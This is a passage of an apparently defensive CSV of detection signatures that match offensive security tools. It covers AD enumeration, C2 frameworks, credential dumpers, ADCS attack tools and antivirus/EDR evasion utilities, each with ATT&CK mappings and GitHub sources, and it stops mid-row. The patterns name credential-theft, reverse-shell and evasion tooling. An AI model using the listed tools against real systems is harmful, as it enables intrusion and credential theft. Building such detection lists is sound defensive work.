"*AD_Enumeration_Hunt-alperen_ugurlu_hack*",".{0,1000}AD_Enumeration_Hunt\-alperen_ugurlu_hack.{0,1000}","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","AD Enumeration","7","1","92","19","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" "*ad_miner.sources.modules.*",".{0,1000}ad_miner\.sources\.modules\..{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","0","AD Enumeration","7","9","808","82","2024-04-17T15:57:37Z","2023-09-26T12:36:59Z" "*AD_Miner-main*",".{0,1000}AD_Miner\-main.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","AD Enumeration","7","9","808","82","2024-04-17T15:57:37Z","2023-09-26T12:36:59Z" "*AD0067D9-4AF6-47C2-B0C3-D768A9624002*",".{0,1000}AD0067D9\-4AF6\-47C2\-B0C3\-D768A9624002.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*ad042ec9afbf29b4b962820a1e82f4d1d6a8c654c42f3c55d6e562dc7a279766*",".{0,1000}ad042ec9afbf29b4b962820a1e82f4d1d6a8c654c42f3c55d6e562dc7a279766.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*ad1117e7a6d3284f9ddc7f8ec841f72b759932d1467cffd9633af242f8f00798*",".{0,1000}ad1117e7a6d3284f9ddc7f8ec841f72b759932d1467cffd9633af242f8f00798.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ad12dd2d23a3fdaa017293fe0acb1d6b60503d86c05b7b4e94e93df8beb1a347*",".{0,1000}ad12dd2d23a3fdaa017293fe0acb1d6b60503d86c05b7b4e94e93df8beb1a347.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ad1e96ef3defc771763f6f6475dc020d543b9712d067aa63ab95ad56a934c5fd*",".{0,1000}ad1e96ef3defc771763f6f6475dc020d543b9712d067aa63ab95ad56a934c5fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*AD495F95-007A-4DC1-9481-0689CA0547D9*",".{0,1000}AD495F95\-007A\-4DC1\-9481\-0689CA0547D9.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*ad8aa2a15aa507d1d9231c4c5ebaa93501fe32c56d287e83c8f7197d4e15b546*",".{0,1000}ad8aa2a15aa507d1d9231c4c5ebaa93501fe32c56d287e83c8f7197d4e15b546.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*ad97557e81bf680c9c796b2673a34562a0f80cb27b88bf53fe20a9a281723e07*",".{0,1000}ad97557e81bf680c9c796b2673a34562a0f80cb27b88bf53fe20a9a281723e07.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*ADACLScan.ps1*",".{0,1000}ADACLScan\.ps1.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*ADACLScanner*",".{0,1000}ADACLScanner.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*ADACLScanner-master*",".{0,1000}ADACLScanner\-master.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*adalanche analyze*",".{0,1000}adalanche\sanalyze.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*adalanche collect*",".{0,1000}adalanche\scollect.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*adalanche-*.exe*",".{0,1000}adalanche\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*Adalanche.git*",".{0,1000}Adalanche\.git.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*adalanche-collector*",".{0,1000}adalanche\-collector.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*Adamantium-Thief-master*",".{0,1000}Adamantium\-Thief\-master.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*ADCEEFBA-CE43-4239-8AE8-7D8D43E66BB1*",".{0,1000}ADCEEFBA\-CE43\-4239\-8AE8\-7D8D43E66BB1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*ADCollector.exe*",".{0,1000}ADCollector\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ADCollector3.csproj*",".{0,1000}ADCollector3\.csproj.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*adconnectdump.py*",".{0,1000}adconnectdump\.py.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*adconnectdump-master*",".{0,1000}adconnectdump\-master.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*ADCS Server location identified on IP *",".{0,1000}ADCS\sServer\slocation\sidentified\son\sIP\s.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","0","N/A","7","1","76","7","2023-12-15T10:49:39Z","2023-12-14T14:31:05Z" "*adcs_enum.*",".{0,1000}adcs_enum\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*adcs_enum_com.*",".{0,1000}adcs_enum_com\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*adcs_enum_com2.*",".{0,1000}adcs_enum_com2\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*ADCS_Maybe_ESC8_HTTPS_Vulnerable.txt*",".{0,1000}ADCS_Maybe_ESC8_HTTPS_Vulnerable\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*adcsattack.py*",".{0,1000}adcsattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ADCSCoercePotato.cpp*",".{0,1000}ADCSCoercePotato\.cpp.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*ADCSCoercePotato.exe*",".{0,1000}ADCSCoercePotato\.exe.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*ADCSCoercePotato.sln*",".{0,1000}ADCSCoercePotato\.sln.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*ADCSCoercePotato.vcxproj*",".{0,1000}ADCSCoercePotato\.vcxproj.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*ADCSCoercePotato\n- @decoder_it 2024\*",".{0,1000}ADCSCoercePotato\\n\-\s\@decoder_it\s2024\\.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*adcshunter.py*",".{0,1000}adcshunter\.py.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","7","1","76","7","2023-12-15T10:49:39Z","2023-12-14T14:31:05Z" "*adcskiller.py*",".{0,1000}adcskiller\.py.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","7","680","69","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" "*ADCSPwn.csproj*",".{0,1000}ADCSPwn\.csproj.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*ADCSPwn.exe*",".{0,1000}ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*ADCSPwn.exe*",".{0,1000}ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ADCSPwn.sln*",".{0,1000}ADCSPwn\.sln.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*ADCSPwn-master*",".{0,1000}ADCSPwn\-master.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*adcsync.py -*",".{0,1000}adcsync\.py\s\-.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "*Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process*",".{0,1000}Add\sWFP\sfilters\sto\sblock\sthe\sIPv4\sand\sIPv6\soutbound\straffic\sof\sa\sspecific\sprocess.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes*",".{0,1000}Add\sWFP\sfilters\sto\sblock\sthe\sIPv4\sand\sIPv6\soutbound\straffic\sof\sall\sdetected\sEDR\sprocesses.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*add_evasion check_fast_forwarding*",".{0,1000}add_evasion\scheck_fast_forwarding.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion computation_fibonacci *",".{0,1000}add_evasion\scomputation_fibonacci\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion computation_timed_fibonacci*",".{0,1000}add_evasion\scomputation_timed_fibonacci.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion evasion_by_sleep *",".{0,1000}add_evasion\sevasion_by_sleep\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion fopen_sandbox_evasion*",".{0,1000}add_evasion\sfopen_sandbox_evasion.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion get_bios_info*",".{0,1000}add_evasion\sget_bios_info.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion get_computer_domain *",".{0,1000}add_evasion\sget_computer_domain\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion get_cpu_cores *",".{0,1000}add_evasion\sget_cpu_cores\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion get_install_date *",".{0,1000}add_evasion\sget_install_date\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - 